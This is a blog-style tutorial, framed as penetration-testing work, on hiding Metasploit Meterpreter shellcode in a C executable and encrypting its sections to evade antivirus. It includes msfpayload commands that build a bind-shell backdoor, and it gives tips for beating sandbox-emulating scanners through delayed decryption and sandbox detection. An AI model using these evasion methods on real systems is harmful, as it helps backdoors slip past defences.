Hide meterpreter shellcode in executable

Have you ever wanted to put meterpreter in an exe file but were annoyed by antivirus detecting it? Here is a way to bypass AV detection by applying the method described in "Code segment encryption" article.

Article published on 11 March 2014
last modification on 29 May 2016

by Emeric Nasi

Note: To understand this document it is important to understand the code segment encyption article.
License : Copyright Emeric Nasi, some rights reserved
This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License.
Creative Commons License

I. Introduction.

As a security professional, I often have to audit the security of a system and demonstrate what malwares could do. A very simple way to do that is to use Metasploit Meterpreter. For those who doesn’t know Meterpreter (the Meta_Interpreter), it is a very advanced payload provided by the Metasploit framework. It provides all features one needs to own a system (privilege elevation, system shell, keylogger, dump password, network routing, disable AV, control webcam, etc).
I often need to generate an autonomous executable which includes this payload. The problem is that the classical way to generate Meterpreter executable is detected by AntiVirus and it is a pain (and not really realistic) to have to disable them. This article describes a way to bypass AV detection of Meterpreter by applying the "Code segment encryption" article.

Note : I will demonstrate this article examples by using the simple Meterpreter Bind_TCP shellcode (Open a server TCP socket on the host and waits for a connection from Metasploit client). Any other shellcode could be used.

II. Classic way to generate Meterpreter executable

II.1Generate binary

Normally the classic way to generate a Meterpreter executable is to use tools provided by Metasploit. The Msfpayload tool can be used for that. For example:
msfpayload windows/meterpreter/bind_tcp LPORT=80 X > met.exe
Here the X option is used to generate executable file.

The MsfPayload tool can also be combined with MsfEncode to generate encoded shellcodes. For example:
msfpayload windows/meterpreter/bind_tcp LPORT=80 R | ./msfencode -c 21 -t exe > met.exe

II.2 Drawbacks

This MsfEncode technique is often presented as a way to bypass AntiVirus analysis, this is however not true anymore. A good number of AntiVirus are able to recognized encoded shellcodes from Metasploit. Also some AntiVirus may have generated signature for executable generated with the X option of msfPayload (this is just a supposition tough).
Another reason why I do not like this method : I prefer to have non-encoded stagers. When I use reverse connection payloads, I want to be able to dynamically patch the shellcode distant IP address and port in the running executable. This isn’t easy if the shellcode is encoded.
For these reasons I prefer to build my own executable file which embeds the shellcode.

III. Put Meterpreter shellcode in C source

III.1 Generate shellcode

In a first step we are going to generate the Meterpreter shellcode. We are going to use the C option of MsfPayload which generates C source code.

msfpayload windows/meterpreter/bind_tcp LPORT=80 C > met.c

If you look inside the met.c file you will see shellcode buffers in C language. The stager is the first shellcode (the small one), it is the one we need to create the network connection. The full Meterpreter shellcode will be downloaded after connection is established. We will copy the stager in our source.

III.2 Source code

In this very basic example, we tell the application that our shellcode is a function and we call that function.

We now have our own executable running Meterpreter, however this is not enough to bypass AV (the shellcode will be easily recognized in the generated binary file). This is why we are going to use section encryption technique explained in code segment encyption article

IV. Bypass AV

We are going to encrypt both the executable code (what is in main function) and the data (the shellcode).

IV.1 Encrypt source code

The source code is normally in the .text section. Since encrypting the whole .text section can be considered to be a malware for some AV, I will just encrypt the code needed to launch the shell code using a new code section, .code.

Note that the old main function is now called shellLaunch. Since we encrypt only part of the .text section we can just define a new main function that will contain the decryptor part.

IV.2 Encrypt shellcode

The shellcode is an array, it will be located in the .data section. Since we only want to encrypt a portion of .data section we will need to create a new data segment for that (.codedata). We will then merge the .codedata in to the .code section. The .code section being the section encrypted by cryptor in the Encrypt code segment article.

I also use .codedata as a constant section, this will allow to encrypt strings you could want to print.

IV.3 Complete source code including decryptor

Here is the complete C source code including the .Stub segment and the decryptor routine.

IV.4 Other considerations

The result of the encryption is enough to bypass the AV such as Avira, McAffee, Norton or Avast.
This is however not enough to bypass AntiVirus which loads the software in memory such as Microsoft Defender. This kind or AV will run their target in a virtual environment , that means the code will be self decrypted, and after that the AV will recognize the shellcode signature. This was actually something quite surprising for me to see, for this case at least: Microsoft had a "better" security product.
There are some ways to bypass this category of AV, for example by using a decryptor that takes some time to decrypt. If the decryptor method is coded in a way that you need to wait a few seconds before shellcode is decrypted, the AV will abandon the scan after a while.There are several ways to do it, for example using special time challenge decryption algorithm. A simple Sleep will not do the trick and be ignored by the AV.
Another way to bypass this AV technique is to detect the software is running in a sandbox environment and to trick the AV if it is the case.

I wrote a paper on this subject with description of fully undetectable methods. You can find it here